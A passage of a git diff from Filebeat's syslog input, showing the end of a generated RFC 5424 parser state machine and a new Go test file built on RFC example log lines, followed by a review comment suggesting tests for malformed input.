_test_eof202: + cs = 202 + goto _test_eof + _test_eof203: + cs = 203 + goto _test_eof + _test_eof204: + cs = 204 + goto _test_eof + _test_eof205: + cs = 205 + goto _test_eof + _test_eof206: + cs = 206 + goto _test_eof + 
_test_eof207: + cs = 207 + goto _test_eof + _test_eof208: + cs = 208 + goto _test_eof + _test_eof209: + cs = 209 + goto _test_eof + _test_eof210: + cs = 210 + goto _test_eof + _test_eof211: + cs = 211 + goto _test_eof + _test_eof212: + cs = 212 + goto _test_eof + _test_eof213: + cs = 213 + goto _test_eof + _test_eof214: + cs = 214 + goto _test_eof + _test_eof215: + cs = 215 + goto _test_eof + _test_eof216: + cs = 216 + goto _test_eof + _test_eof217: + cs = 217 + goto _test_eof + _test_eof218: + cs = 218 + goto _test_eof + _test_eof219: + cs = 219 + goto _test_eof + _test_eof220: + cs = 220 + goto _test_eof + _test_eof221: + cs = 221 + goto _test_eof + _test_eof222: + cs = 222 + goto _test_eof + _test_eof223: + cs = 223 + goto _test_eof + _test_eof224: + cs = 224 + goto _test_eof + _test_eof225: + cs = 225 + goto _test_eof + _test_eof226: + cs = 226 + goto _test_eof + _test_eof227: + cs = 227 + goto _test_eof + _test_eof228: + cs = 228 + goto _test_eof + _test_eof229: + cs = 229 + goto _test_eof + _test_eof230: + cs = 230 + goto _test_eof + _test_eof231: + cs = 231 + goto _test_eof + _test_eof232: + cs = 232 + goto _test_eof + _test_eof233: + cs = 233 + goto _test_eof + _test_eof234: + cs = 234 + goto _test_eof + _test_eof235: + cs = 235 + goto _test_eof + _test_eof236: + cs = 236 + goto _test_eof + _test_eof237: + cs = 237 + goto _test_eof + _test_eof238: + cs = 238 + goto _test_eof + _test_eof239: + cs = 239 + goto _test_eof + _test_eof240: + cs = 240 + goto _test_eof + _test_eof241: + cs = 241 + goto _test_eof + _test_eof242: + cs = 242 + goto _test_eof + _test_eof243: + cs = 243 + goto _test_eof + _test_eof244: + cs = 244 + goto _test_eof + _test_eof245: + cs = 245 + goto _test_eof + _test_eof246: + cs = 246 + goto _test_eof + _test_eof247: + cs = 247 + goto _test_eof + _test_eof248: + cs = 248 + goto _test_eof + _test_eof249: + cs = 249 + goto _test_eof + _test_eof250: + cs = 250 + goto _test_eof + _test_eof251: + cs = 251 + goto _test_eof + _test_eof252: + cs 
= 252 + goto _test_eof + _test_eof253: + cs = 253 + goto _test_eof + _test_eof254: + cs = 254 + goto _test_eof + _test_eof255: + cs = 255 + goto _test_eof + _test_eof256: + cs = 256 + goto _test_eof + _test_eof257: + cs = 257 + goto _test_eof + _test_eof258: + cs = 258 + goto _test_eof + _test_eof259: + cs = 259 + goto _test_eof + _test_eof260: + cs = 260 + goto _test_eof + _test_eof261: + cs = 261 + goto _test_eof + _test_eof262: + cs = 262 + goto _test_eof + _test_eof263: + cs = 263 + goto _test_eof + _test_eof264: + cs = 264 + goto _test_eof + _test_eof265: + cs = 265 + goto _test_eof + _test_eof266: + cs = 266 + goto _test_eof + _test_eof267: + cs = 267 + goto _test_eof + _test_eof268: + cs = 268 + goto _test_eof + _test_eof269: + cs = 269 + goto _test_eof + _test_eof270: + cs = 270 + goto _test_eof + _test_eof271: + cs = 271 + goto _test_eof + _test_eof272: + cs = 272 + goto _test_eof + _test_eof273: + cs = 273 + goto _test_eof + _test_eof274: + cs = 274 + goto _test_eof + _test_eof275: + cs = 275 + goto _test_eof + _test_eof276: + cs = 276 + goto _test_eof + _test_eof277: + cs = 277 + goto _test_eof + _test_eof278: + cs = 278 + goto _test_eof + _test_eof279: + cs = 279 + goto _test_eof + _test_eof280: + cs = 280 + goto _test_eof + _test_eof281: + cs = 281 + goto _test_eof + _test_eof282: + cs = 282 + goto _test_eof + _test_eof283: + cs = 283 + goto _test_eof + _test_eof284: + cs = 284 + goto _test_eof + _test_eof285: + cs = 285 + goto _test_eof + _test_eof286: + cs = 286 + goto _test_eof + _test_eof287: + cs = 287 + goto _test_eof + _test_eof288: + cs = 288 + goto _test_eof + _test_eof289: + cs = 289 + goto _test_eof + _test_eof290: + cs = 290 + goto _test_eof + _test_eof291: + cs = 291 + goto _test_eof + _test_eof292: + cs = 292 + goto _test_eof + _test_eof293: + cs = 293 + goto _test_eof + _test_eof294: + cs = 294 + goto _test_eof + _test_eof295: + cs = 295 + goto _test_eof + _test_eof296: + cs = 296 + goto _test_eof + _test_eof297: + cs = 297 + goto 
_test_eof + _test_eof298: + cs = 298 + goto _test_eof + _test_eof299: + cs = 299 + goto _test_eof + _test_eof300: + cs = 300 + goto _test_eof + _test_eof301: + cs = 301 + goto _test_eof + _test_eof302: + cs = 302 + goto _test_eof + _test_eof303: + cs = 303 + goto _test_eof + _test_eof304: + cs = 304 + goto _test_eof + _test_eof305: + cs = 305 + goto _test_eof + _test_eof306: + cs = 306 + goto _test_eof + _test_eof307: + cs = 307 + goto _test_eof + _test_eof308: + cs = 308 + goto _test_eof + _test_eof309: + cs = 309 + goto _test_eof + _test_eof310: + cs = 310 + goto _test_eof + _test_eof311: + cs = 311 + goto _test_eof + _test_eof312: + cs = 312 + goto _test_eof + _test_eof313: + cs = 313 + goto _test_eof + _test_eof314: + cs = 314 + goto _test_eof + _test_eof315: + cs = 315 + goto _test_eof + _test_eof316: + cs = 316 + goto _test_eof + _test_eof317: + cs = 317 + goto _test_eof + _test_eof318: + cs = 318 + goto _test_eof + _test_eof319: + cs = 319 + goto _test_eof + _test_eof320: + cs = 320 + goto _test_eof + _test_eof321: + cs = 321 + goto _test_eof + _test_eof322: + cs = 322 + goto _test_eof + _test_eof323: + cs = 323 + goto _test_eof + _test_eof324: + cs = 324 + goto _test_eof + _test_eof325: + cs = 325 + goto _test_eof + _test_eof326: + cs = 326 + goto _test_eof + _test_eof327: + cs = 327 + goto _test_eof + _test_eof328: + cs = 328 + goto _test_eof + _test_eof329: + cs = 329 + goto _test_eof + _test_eof330: + cs = 330 + goto _test_eof + _test_eof331: + cs = 331 + goto _test_eof + _test_eof332: + cs = 332 + goto _test_eof + _test_eof333: + cs = 333 + goto _test_eof + _test_eof334: + cs = 334 + goto _test_eof + _test_eof335: + cs = 335 + goto _test_eof + _test_eof336: + cs = 336 + goto _test_eof + _test_eof337: + cs = 337 + goto _test_eof + _test_eof338: + cs = 338 + goto _test_eof + _test_eof339: + cs = 339 + goto _test_eof + _test_eof340: + cs = 340 + goto _test_eof + _test_eof341: + cs = 341 + goto _test_eof + _test_eof342: + cs = 342 + goto _test_eof + 
_test_eof343: + cs = 343 + goto _test_eof + _test_eof344: + cs = 344 + goto _test_eof + _test_eof345: + cs = 345 + goto _test_eof + _test_eof346: + cs = 346 + goto _test_eof + _test_eof347: + cs = 347 + goto _test_eof + _test_eof348: + cs = 348 + goto _test_eof + _test_eof349: + cs = 349 + goto _test_eof + _test_eof350: + cs = 350 + goto _test_eof + _test_eof351: + cs = 351 + goto _test_eof + _test_eof352: + cs = 352 + goto _test_eof + _test_eof353: + cs = 353 + goto _test_eof + _test_eof354: + cs = 354 + goto _test_eof + _test_eof355: + cs = 355 + goto _test_eof + _test_eof356: + cs = 356 + goto _test_eof + _test_eof357: + cs = 357 + goto _test_eof + _test_eof358: + cs = 358 + goto _test_eof + _test_eof359: + cs = 359 + goto _test_eof + _test_eof360: + cs = 360 + goto _test_eof + _test_eof361: + cs = 361 + goto _test_eof + _test_eof362: + cs = 362 + goto _test_eof + _test_eof363: + cs = 363 + goto _test_eof + _test_eof364: + cs = 364 + goto _test_eof + _test_eof365: + cs = 365 + goto _test_eof + _test_eof366: + cs = 366 + goto _test_eof + _test_eof367: + cs = 367 + goto _test_eof + _test_eof368: + cs = 368 + goto _test_eof + _test_eof369: + cs = 369 + goto _test_eof + _test_eof370: + cs = 370 + goto _test_eof + _test_eof371: + cs = 371 + goto _test_eof + _test_eof372: + cs = 372 + goto _test_eof + _test_eof373: + cs = 373 + goto _test_eof + _test_eof374: + cs = 374 + goto _test_eof + _test_eof375: + cs = 375 + goto _test_eof + _test_eof376: + cs = 376 + goto _test_eof + _test_eof377: + cs = 377 + goto _test_eof + _test_eof378: + cs = 378 + goto _test_eof + _test_eof379: + cs = 379 + goto _test_eof + _test_eof380: + cs = 380 + goto _test_eof + _test_eof381: + cs = 381 + goto _test_eof + _test_eof382: + cs = 382 + goto _test_eof + _test_eof383: + cs = 383 + goto _test_eof + _test_eof384: + cs = 384 + goto _test_eof + _test_eof385: + cs = 385 + goto _test_eof + _test_eof386: + cs = 386 + goto _test_eof + _test_eof387: + cs = 387 + goto _test_eof + _test_eof388: + cs 
= 388 + goto _test_eof + _test_eof389: + cs = 389 + goto _test_eof + _test_eof390: + cs = 390 + goto _test_eof + _test_eof391: + cs = 391 + goto _test_eof + _test_eof392: + cs = 392 + goto _test_eof + _test_eof393: + cs = 393 + goto _test_eof + _test_eof394: + cs = 394 + goto _test_eof + _test_eof395: + cs = 395 + goto _test_eof + _test_eof396: + cs = 396 + goto _test_eof + _test_eof397: + cs = 397 + goto _test_eof + _test_eof398: + cs = 398 + goto _test_eof + _test_eof399: + cs = 399 + goto _test_eof + _test_eof400: + cs = 400 + goto _test_eof + _test_eof401: + cs = 401 + goto _test_eof + _test_eof402: + cs = 402 + goto _test_eof + _test_eof403: + cs = 403 + goto _test_eof + _test_eof404: + cs = 404 + goto _test_eof + _test_eof405: + cs = 405 + goto _test_eof + _test_eof406: + cs = 406 + goto _test_eof + _test_eof407: + cs = 407 + goto _test_eof + _test_eof408: + cs = 408 + goto _test_eof + _test_eof409: + cs = 409 + goto _test_eof + _test_eof410: + cs = 410 + goto _test_eof + _test_eof411: + cs = 411 + goto _test_eof + _test_eof412: + cs = 412 + goto _test_eof + _test_eof413: + cs = 413 + goto _test_eof + _test_eof414: + cs = 414 + goto _test_eof + _test_eof415: + cs = 415 + goto _test_eof + _test_eof416: + cs = 416 + goto _test_eof + _test_eof417: + cs = 417 + goto _test_eof + _test_eof418: + cs = 418 + goto _test_eof + _test_eof419: + cs = 419 + goto _test_eof + _test_eof420: + cs = 420 + goto _test_eof + _test_eof421: + cs = 421 + goto _test_eof + _test_eof422: + cs = 422 + goto _test_eof + _test_eof423: + cs = 423 + goto _test_eof + _test_eof424: + cs = 424 + goto _test_eof + _test_eof425: + cs = 425 + goto _test_eof + _test_eof426: + cs = 426 + goto _test_eof + _test_eof427: + cs = 427 + goto _test_eof + _test_eof428: + cs = 428 + goto _test_eof + _test_eof429: + cs = 429 + goto _test_eof + _test_eof430: + cs = 430 + goto _test_eof + _test_eof431: + cs = 431 + goto _test_eof + _test_eof432: + cs = 432 + goto _test_eof + _test_eof433: + cs = 433 + goto 
_test_eof + _test_eof434: + cs = 434 + goto _test_eof + _test_eof435: + cs = 435 + goto _test_eof + _test_eof436: + cs = 436 + goto _test_eof + _test_eof437: + cs = 437 + goto _test_eof + _test_eof438: + cs = 438 + goto _test_eof + _test_eof439: + cs = 439 + goto _test_eof + _test_eof440: + cs = 440 + goto _test_eof + _test_eof441: + cs = 441 + goto _test_eof + _test_eof442: + cs = 442 + goto _test_eof + _test_eof443: + cs = 443 + goto _test_eof + _test_eof444: + cs = 444 + goto _test_eof + _test_eof445: + cs = 445 + goto _test_eof + _test_eof446: + cs = 446 + goto _test_eof + _test_eof447: + cs = 447 + goto _test_eof + _test_eof448: + cs = 448 + goto _test_eof + _test_eof449: + cs = 449 + goto _test_eof + _test_eof450: + cs = 450 + goto _test_eof + _test_eof451: + cs = 451 + goto _test_eof + _test_eof452: + cs = 452 + goto _test_eof + _test_eof453: + cs = 453 + goto _test_eof + _test_eof454: + cs = 454 + goto _test_eof + _test_eof455: + cs = 455 + goto _test_eof + _test_eof456: + cs = 456 + goto _test_eof + _test_eof457: + cs = 457 + goto _test_eof + _test_eof458: + cs = 458 + goto _test_eof + _test_eof459: + cs = 459 + goto _test_eof + _test_eof460: + cs = 460 + goto _test_eof + _test_eof461: + cs = 461 + goto _test_eof + _test_eof462: + cs = 462 + goto _test_eof + _test_eof463: + cs = 463 + goto _test_eof + _test_eof464: + cs = 464 + goto _test_eof + _test_eof465: + cs = 465 + goto _test_eof + _test_eof466: + cs = 466 + goto _test_eof + _test_eof467: + cs = 467 + goto _test_eof + _test_eof468: + cs = 468 + goto _test_eof + _test_eof469: + cs = 469 + goto _test_eof + _test_eof470: + cs = 470 + goto _test_eof + _test_eof471: + cs = 471 + goto _test_eof + _test_eof472: + cs = 472 + goto _test_eof + _test_eof473: + cs = 473 + goto _test_eof + _test_eof474: + cs = 474 + goto _test_eof + _test_eof475: + cs = 475 + goto _test_eof + _test_eof476: + cs = 476 + goto _test_eof + _test_eof477: + cs = 477 + goto _test_eof + _test_eof478: + cs = 478 + goto _test_eof + 
_test_eof479: + cs = 479 + goto _test_eof + _test_eof480: + cs = 480 + goto _test_eof + _test_eof481: + cs = 481 + goto _test_eof + _test_eof482: + cs = 482 + goto _test_eof + _test_eof483: + cs = 483 + goto _test_eof + _test_eof484: + cs = 484 + goto _test_eof + _test_eof485: + cs = 485 + goto _test_eof + _test_eof486: + cs = 486 + goto _test_eof + _test_eof487: + cs = 487 + goto _test_eof + _test_eof488: + cs = 488 + goto _test_eof + _test_eof489: + cs = 489 + goto _test_eof + _test_eof490: + cs = 490 + goto _test_eof + _test_eof491: + cs = 491 + goto _test_eof + _test_eof492: + cs = 492 + goto _test_eof + _test_eof493: + cs = 493 + goto _test_eof + _test_eof494: + cs = 494 + goto _test_eof + _test_eof495: + cs = 495 + goto _test_eof + _test_eof496: + cs = 496 + goto _test_eof + _test_eof497: + cs = 497 + goto _test_eof + _test_eof498: + cs = 498 + goto _test_eof + _test_eof499: + cs = 499 + goto _test_eof + _test_eof500: + cs = 500 + goto _test_eof + _test_eof501: + cs = 501 + goto _test_eof + _test_eof502: + cs = 502 + goto _test_eof + _test_eof503: + cs = 503 + goto _test_eof + _test_eof504: + cs = 504 + goto _test_eof + _test_eof505: + cs = 505 + goto _test_eof + _test_eof506: + cs = 506 + goto _test_eof + _test_eof507: + cs = 507 + goto _test_eof + _test_eof508: + cs = 508 + goto _test_eof + _test_eof509: + cs = 509 + goto _test_eof + _test_eof510: + cs = 510 + goto _test_eof + _test_eof511: + cs = 511 + goto _test_eof + _test_eof512: + cs = 512 + goto _test_eof + _test_eof513: + cs = 513 + goto _test_eof + _test_eof514: + cs = 514 + goto _test_eof + _test_eof515: + cs = 515 + goto _test_eof + _test_eof516: + cs = 516 + goto _test_eof + _test_eof517: + cs = 517 + goto _test_eof + _test_eof518: + cs = 518 + goto _test_eof + _test_eof519: + cs = 519 + goto _test_eof + _test_eof520: + cs = 520 + goto _test_eof + _test_eof521: + cs = 521 + goto _test_eof + _test_eof522: + cs = 522 + goto _test_eof + _test_eof523: + cs = 523 + goto _test_eof + _test_eof524: + cs 
= 524 + goto _test_eof + _test_eof525: + cs = 525 + goto _test_eof + _test_eof526: + cs = 526 + goto _test_eof + _test_eof527: + cs = 527 + goto _test_eof + _test_eof528: + cs = 528 + goto _test_eof + _test_eof529: + cs = 529 + goto _test_eof + _test_eof530: + cs = 530 + goto _test_eof + _test_eof531: + cs = 531 + goto _test_eof + _test_eof532: + cs = 532 + goto _test_eof + _test_eof533: + cs = 533 + goto _test_eof + _test_eof534: + cs = 534 + goto _test_eof + _test_eof535: + cs = 535 + goto _test_eof + _test_eof536: + cs = 536 + goto _test_eof + _test_eof537: + cs = 537 + goto _test_eof + _test_eof538: + cs = 538 + goto _test_eof + _test_eof539: + cs = 539 + goto _test_eof + _test_eof540: + cs = 540 + goto _test_eof + _test_eof541: + cs = 541 + goto _test_eof + _test_eof542: + cs = 542 + goto _test_eof + _test_eof543: + cs = 543 + goto _test_eof + _test_eof544: + cs = 544 + goto _test_eof + _test_eof545: + cs = 545 + goto _test_eof + _test_eof546: + cs = 546 + goto _test_eof + _test_eof547: + cs = 547 + goto _test_eof + _test_eof548: + cs = 548 + goto _test_eof + _test_eof549: + cs = 549 + goto _test_eof + _test_eof550: + cs = 550 + goto _test_eof + _test_eof551: + cs = 551 + goto _test_eof + _test_eof552: + cs = 552 + goto _test_eof + _test_eof553: + cs = 553 + goto _test_eof + _test_eof554: + cs = 554 + goto _test_eof + _test_eof555: + cs = 555 + goto _test_eof + _test_eof556: + cs = 556 + goto _test_eof + _test_eof557: + cs = 557 + goto _test_eof + _test_eof558: + cs = 558 + goto _test_eof + _test_eof559: + cs = 559 + goto _test_eof + _test_eof560: + cs = 560 + goto _test_eof + _test_eof561: + cs = 561 + goto _test_eof + _test_eof562: + cs = 562 + goto _test_eof + _test_eof563: + cs = 563 + goto _test_eof + _test_eof564: + cs = 564 + goto _test_eof + _test_eof565: + cs = 565 + goto _test_eof + _test_eof566: + cs = 566 + goto _test_eof + _test_eof567: + cs = 567 + goto _test_eof + _test_eof568: + cs = 568 + goto _test_eof + _test_eof569: + cs = 569 + goto 
_test_eof + _test_eof570: + cs = 570 + goto _test_eof + _test_eof571: + cs = 571 + goto _test_eof + _test_eof572: + cs = 572 + goto _test_eof + _test_eof573: + cs = 573 + goto _test_eof + _test_eof574: + cs = 574 + goto _test_eof + _test_eof575: + cs = 575 + goto _test_eof + _test_eof576: + cs = 576 + goto _test_eof + _test_eof577: + cs = 577 + goto _test_eof + _test_eof578: + cs = 578 + goto _test_eof + _test_eof579: + cs = 579 + goto _test_eof + _test_eof580: + cs = 580 + goto _test_eof + _test_eof581: + cs = 581 + goto _test_eof + _test_eof582: + cs = 582 + goto _test_eof + _test_eof583: + cs = 583 + goto _test_eof + _test_eof584: + cs = 584 + goto _test_eof + _test_eof585: + cs = 585 + goto _test_eof + _test_eof586: + cs = 586 + goto _test_eof + + _test_eof: + { + } + if (p) == eof { + switch cs { + case 589: +//line parser/common.rl:11 + + event.SetMessage(data[tok:p]) + + case 588: +//line parser/common.rl:3 + + tok = p + +//line parser/common.rl:11 + + event.SetMessage(data[tok:p]) + +//line rfc5424_parser.go:9756 + } + } + + _out: + { + } + } + +//line parser/rfc5424_parser.rl:35 + +} diff --git a/filebeat/input/syslog/rfc5424_test.go b/filebeat/input/syslog/rfc5424_test.go new file mode 100644 index 00000000000..a22fe6a0e2d --- /dev/null +++ b/filebeat/input/syslog/rfc5424_test.go 
@@ -0,0 +1,330 @@
+// Licensed to Elasticsearch B.V. under one or more contributor
+// license agreements. See the NOTICE file distributed with
+// this work for additional information regarding copyright
+// ownership. Elasticsearch B.V. licenses this file to you under
+// the Apache License, Version 2.0 (the "License"); you may
+// not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing,
+// software distributed under the License is distributed on an
+// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+// KIND, either express or implied. See the License for the
+// specific language governing permissions and limitations
+// under the License.
+
+package syslog
+
+import (
+ "fmt"
+ "testing"
+ "time"
+
+ "github.com/stretchr/testify/assert"
+)
+
+const BOM = "\xEF\xBB\xBF"
+
+const VersionTestTemplate = `<34>%d 2003-10-11T22:14:15.003Z mymachine.example.com su - ID47 - ` + BOM + `'su root' failed for lonvick on /dev/pts/8`
+const PriorityTestTemplate = `<%d>1 2003-10-11T22:14:15.003Z mymachine.example.com su - ID47 - ` + BOM + `'su root' failed for lonvick on /dev/pts/8`
+
+// https://tools.ietf.org/html/rfc5424#section-6.5
+const RfcDoc65Example1 = `<34>1 2003-10-11T22:14:15.003Z mymachine.example.com su - ID47 - ` + BOM + `'su root' failed for lonvick on /dev/pts/8`
+const RfcDoc65Example2 = `<165>1 2003-08-24T05:14:15.000003-07:00 192.0.2.1 myproc 8710 - - %% It's time to make the do-nuts.`
+const RfcDoc65Example3 = `<165>1 2003-10-11T22:14:15.003Z mymachine.example.com evntslog - ID47 [exampleSDID@32473 iut="3" eventSource="Application" eventID="1011"] ` + BOM + `An application event log entry...`
+const RfcDoc65Example4 = `<165>1 2003-10-11T22:14:15.003Z mymachine.example.com evntslog - ID47 [exampleSDID@32473 iut="3" eventSource="Application" eventID="1011"][examplePriority@32473 class="high"]`
+const RfcDoc65Example4WithoutSD = `<165>1 2003-10-11T22:14:15.003Z mymachine.example.com evntslog - ID47 `
+const MESSAGE = `An application event log entry...`
+
+func getTestEvent() event {
+ return event{
+ priority: 34,
+ version: 1,
+ hostname: "mymachine.example.com",
+ appName: "su",
+ processID: "-",
+ msgID: "ID47",
+ year: 2003,
+ month: 10,
+ day: 11,
+ hour: 22,
+ minute: 14,
+ second: 15,
+ nanosecond: 3000000,
+ message: "'su root' failed for lonvick on /dev/pts/8",
+ }
+}
+
+type testRule struct {
+ title string
+ log []byte
+ syslog event
+ isFailed bool
+}
+
+func runTests(rules []testRule, t *testing.T) {
+ for _, rule := range rules {
+ t.Run(fmt.Sprintf("%s:%s", rule.title, string(rule.log)), func(t *testing.T) {
+ l := newEvent()
+ ParserRFC5424(rule.log, l)
+ if rule.isFailed {
+ assert.Equal(t, false, l.IsValid())
+ return
+ } else {
+ assert.Equal(t, true, l.IsValid())
+ }
+ AssertEvent(t, rule.syslog, l)
+ })
+ }
+}
+func TestRfc5424ParseHeader(t *testing.T) {
+ var tests = []testRule{{
+ title: "RfcDoc 6.5 Example1",
+ log: []byte(RfcDoc65Example1),
+ syslog: getTestEvent(),
+ }, {
+ title: "RfcDoc 6.5 Example2",
+ log: []byte(RfcDoc65Example2),
+ syslog: event{
+ priority: 165,
+ version: 1,
+ hostname: "192.0.2.1",
+ appName: "myproc",
+ processID: "8710",
+ msgID: "-",
+ year: 2003,
+ month: 8,
+ day: 24,
+ hour: 5,
+ minute: 14,
+ second: 15,
+ nanosecond: 3000,
+ message: `%% It's time to make the do-nuts.`,
+ loc: time.FixedZone("", -7*3600),
+ },
+ }}
+ runTests(tests, t)
+}
+
+func CreateStructuredDataWithMsg(msg string, data EventData) event {
+ return event{
+ priority: 165,
+ version: 1,
+ hostname: "mymachine.example.com",
+ appName: "evntslog",
+ processID: "-",
+ msgID: "ID47",
+ year: 2003,
+ month: 10,
+ day: 11,
+ hour: 22,
+ minute: 14,
+ second: 15,
+ nanosecond: 3000000,
+ message: msg,
+ data: data,
+ }
+}
+func CreateStructuredData(data EventData) event {
+ return CreateStructuredDataWithMsg(MESSAGE, data)
+}
+
+func CreateTest(title string, log string, syslog event) testRule {
+ return testRule{
+ title: title,
+ log: []byte(log),
+ syslog: syslog,
+ isFailed: false,
+ }
+}
+
+func CreateParseFailTest(title string, log string, syslog event) testRule {
+ return testRule{
+ title: title,
+ log: []byte(log),
+ syslog: syslog,
+ isFailed: true,
+ }
+}
+
+func TestRfc5424ParseStructuredData(t *testing.T) {
+ var tests = []testRule{
+ CreateTest("RfcDoc65Example3",
+ RfcDoc65Example3,
+ CreateStructuredData(EventData{
+ "exampleSDID@32473": {
+ "iut": "3",
+ "eventID": "1011",
+ "eventSource": "Application",
+ },
+ })),
+ CreateTest("RfcDoc65Example4",
+ RfcDoc65Example4,
+ CreateStructuredDataWithMsg("", EventData{
+ "exampleSDID@32473": {
+ "iut": "3",
+ "eventID": "1011",
+ "eventSource": "Application",
+ },
+ "examplePriority@32473": {
+ "class": "high",
+ },
+ })),
+ CreateTest("test structured data param value with escape",
+ `<165>1 2003-10-11T22:14:15.003Z mymachine.example.com evntslog - ID47 [exampleSDID@32473 iut="\]3" eventSource="\"Application\"" eventID="1011"] `+MESSAGE,
+ CreateStructuredData(EventData{
+ "exampleSDID@32473": {
+ "iut": "]3",
+ "eventID": "1011",
+ "eventSource": `"Application"`,
+ },
+ })),
+ // https://tools.ietf.org/html/rfc5424#section-6.3.5
+ CreateTest("RfcDoc635Example1",
+ RfcDoc65Example4WithoutSD+`[exampleSDID@32473 iut="3" eventSource="Application" eventID="1011"]`,
+ CreateStructuredDataWithMsg("", EventData{
+ "exampleSDID@32473": {
+ "iut": "3",
+ "eventID": "1011",
+ "eventSource": "Application",
+ },
+ })),
+
+ CreateTest("RfcDoc635Example2",
+ RfcDoc65Example4WithoutSD+`[exampleSDID@32473 iut="3" eventSource="Application" eventID="1011"][examplePriority@32473 class="high"]`,
+ CreateStructuredDataWithMsg("", EventData{
+ "exampleSDID@32473": {
+ "iut": "3",
+ "eventID": "1011",
+ "eventSource": "Application",
+ },
+ "examplePriority@32473": {
+ "class": "high",
+ },
+ })),
+ CreateTest("RfcDoc635Example3",
+ RfcDoc65Example4WithoutSD+`[exampleSDID@32473 iut="3" eventSource="Application" eventID="1011"] [examplePriority@32473 class="high"] `+MESSAGE,
+ CreateStructuredDataWithMsg(`[examplePriority@32473 class="high"] `+MESSAGE, EventData{
+ "exampleSDID@32473": {
+ "iut": "3",
+ "eventID": "1011",
+ "eventSource": "Application",
+ },
+ })),
+ CreateParseFailTest("RfcDoc635Example4",
+ RfcDoc65Example4WithoutSD+`[ exampleSDID@32473 iut="3" eventSource="Application" eventID="1011" ][examplePriority@32473 class="high"]`+MESSAGE,
+ CreateStructuredDataWithMsg(``, EventData{})),
+
+ CreateTest("RfcDoc635Example5",
+ RfcDoc65Example4WithoutSD+`[sigSig ver="1" rsID="1234" iut="3" signature="..."] `+MESSAGE,
+ CreateStructuredDataWithMsg(MESSAGE, EventData{
+ "sigSig": {
+ "ver": "1",
+ "rsID": "1234",
+ "iut": "3",
+ "signature": "...",
+ },
+ })),
+ }
+
+ runTests(tests, t)
+}
+func createVersionTestRule(v int, success bool) testRule {
+ var rule = testRule{
+ title: fmt.Sprintf("versionTest v:%d", v),
+ log: []byte(fmt.Sprintf(VersionTestTemplate, v)),
+ syslog: event{
+ priority: 34,
+ version: v,
+ hostname: "mymachine.example.com",
+ appName: "su",
+ processID: "-",
+ msgID: "ID47",
+ year: 2003,
+ month: 10,
+ day: 11,
+ hour: 22,
+ minute: 14,
+ second: 15,
+ nanosecond: 3000000,
+ message: "'su root' failed for lonvick on /dev/pts/8",
+ }}
+
+ if !success {
+ rule.isFailed = true
+ return rule
+ }
+
+ return rule
+}
+
+func createPriorityTestRule(v int, success bool) testRule {
+ var rule = testRule{
+ title: fmt.Sprintf("priorityTest v:%d", v),
+ log: []byte(fmt.Sprintf(PriorityTestTemplate, v)),
+ syslog: event{
+ priority: v,
+ version: 1,
+ hostname: "mymachine.example.com",
+ appName: "su",
+ processID: "-",
+ msgID: "ID47",
+ year: 2003,
+ month: 10,
+ day: 11,
+ hour: 22,
+ minute: 14,
+ second: 15,
+ message: "'su root' failed for lonvick on /dev/pts/8",
+ nanosecond: 3000000,
+ },
+ }
+ if !success {
+ rule.isFailed = true
+ return rule
+ }
+ return rule
+}
+
+func TestRfc5424SyslogParserValueBoundary(t *testing.T) {
+ var tests []testRule
+
+ // add priorityTest, 0 <= priority <= 191.
+ tests = append(tests, createPriorityTestRule(0, true))
+ tests = append(tests, createPriorityTestRule(20, true))
+ tests = append(tests, createPriorityTestRule(180, true))
+ tests = append(tests, createPriorityTestRule(190, true))
+ tests = append(tests, createPriorityTestRule(191, true))
+ tests = append(tests, createPriorityTestRule(192, false))
+ tests = append(tests, createPriorityTestRule(200, false))
+ tests = append(tests, createPriorityTestRule(1000, false))
+
+ // add version test, version <= 999
+ tests = append(tests, createVersionTestRule(0, false))
+ tests = append(tests, createVersionTestRule(30, true))
+ tests = append(tests, createVersionTestRule(100, true))
+ tests = append(tests, createVersionTestRule(1000, false))
+
+ runTests(tests, t)
+}
+
+func AssertEvent(t *testing.T, except event, actual *event) {
+ assert.Equal(t, except.Priority(), actual.Priority())
+ assert.Equal(t, except.Version(), actual.Version())
+ assert.Equal(t, except.Year(), actual.Year())
+ assert.Equal(t, except.Month(), actual.Month())
+ assert.Equal(t, except.Day(), actual.Day())
+ assert.Equal(t, except.Hour(), actual.Hour())
+ assert.Equal(t, except.Minute(), actual.Minute())
+ assert.Equal(t, except.Second(), actual.Second())
+ assert.Equal(t, except.Nanosecond(), actual.Nanosecond())
+ assert.Equal(t, except.loc, actual.loc)
+ assert.Equal(t, except.Hostname(), actual.Hostname())
+ assert.Equal(t, except.AppName(), actual.AppName())
+ assert.Equal(t, except.ProcID(), actual.ProcID())
+ assert.Equal(t, except.MsgID(), actual.MsgID())
+ assert.Equal(t, except.data, actual.data)
+ assert.Equal(t, except.Message(), actual.Message())
+}
diff --git a/filebeat/module/apache/access/config/access.yml b/filebeat/module/apache/access/config/access.yml
index 2db4213af7b..100ae74fadc 100644
--- a/filebeat/module/apache/access/config/access.yml
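Review bot: Malformed input is barely covered in rfc5424_test.go: the only rejection cases are the out-of-range PRI/VERSION values in `TestRfc5424SyslogParserValueBoundary` and the single `CreateParseFailTest` in `TestRfc5424ParseStructuredData`, while `ParserRFC5424` parses lines whose content the sender controls. I would add failing rules for empty input, a line truncated inside the header, and an unterminated structured-data element, for example `CreateParseFailTest("unterminated SD", RfcDoc65Example4WithoutSD+"[exampleSDID@32473 iut=\"3", event{})`; whether the parser marks each of these invalid is not visible from the test file, so the expected flag should be confirmed against the grammar. In `runTests` the failure branch returns before `AssertEvent`, so the `syslog` value passed to `CreateParseFailTest` is never compared and could be dropped from its signature. As a point of style, the `else` after `return` in `runTests` is redundant, and the `except` parameter of `AssertEvent` presumably means `expected`.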
